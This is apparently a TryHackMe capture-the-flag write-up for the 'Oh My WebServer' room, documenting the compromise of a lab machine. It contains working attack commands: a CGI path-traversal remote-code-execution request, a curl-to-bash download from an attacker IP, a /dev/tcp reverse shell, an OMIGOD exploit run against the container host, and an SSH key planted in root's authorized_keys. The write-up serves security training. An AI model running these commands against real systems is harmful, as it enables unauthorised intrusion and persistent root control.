THM: Oh My WebServer
Can you root me?
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 61 80/tcp open http syn-ack ttl 60
We only have a couple ports open, the first page on port 80 isn’t very useful. We can bruteforce other directories:
We can attempt RCE via
/cgi-bin as per:
curl -v 'http://omw.thm/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"
We can confirm that we have RCE:
We can move over to getting a shell from here. This looks to be a docker container:
We can get a reverse shell into it and try move onto the host machine:
curl -v 'http://omw.thm/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; curl 10.2.96.144:8000/rev.sh | bash' -H "Content-Type: text/plain"
#!/bin/bash /bin/bash -i >& /dev/tcp/10.2.96.144/4443 0>&1
We don’t have a great deal, we can grab a static nmap binary from:
And copy it over to the box using curl:
Scanning the host machine (
172.17.0.1) we find a few ports open:
WinRM appears to be open, we can look for potential priv esc using this. There has been a recent exploit regarding this that we can try:
We have a public script for this too:
We curl it over to our local machine then to our target machine. We run the script to get RCE:
python3 omigod.py -t 172.17.0.1 -c "whoami;id"
We can echo our SSH key into
python3 omigod.py -t 172.17.0.1 -c "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDWUBaN4KEKiLUigtsZ9r96iBQMeZn8juR8cAGDMp8iwreXPeQFSDglAq1pIkaNShoxdmcofAyiCXJ/b2pFRhfhQx3Hx92k8Voym6nI0UMElCYZQhfIzqj9sr9L2QXsWFvOqByvptpYFOEjXLnswYQI+a0iUgizQ6ITkLt2zoFGabQKWmDo8zogLzgKAvCKN4tBuVyXvR2ISdRJ+lByfY5fTWkInq+wfmeMP/NuFGS9TlYMI2Aks8ac8HPsC4mqDUEvUMBIWrsxlNKqfJ120wCVKHsxVzWZ/7j0kMt+7sNouqwXOVnv2pF6XS1GYWeYzgF3zqFjHVS7w5hTUv+oWD7/SJ2hiCrPXKG9sNveDNTPaTKrmD8h5gjc9h8yuvjQe1DkX/SRjpTwltx9q/PsVZyoe8GFxVpD8d5zyKALpBq61Wknhk7itD5z/IukremFyoyGAWULUuGzlRmsQr3naSEixboGDYS2xOjJwTNvE+GIdmrNK351Fvfy1MvuB64jiEk= syn@deb64 ' > /root/.ssh/authorized_keys"
After doing so, we get a root shell:
We can grab our root flag
Our user flag is inside of one of the docker containers so we needed to get root first for it. Using the find command, we can grab it:
find / -name "user.txt"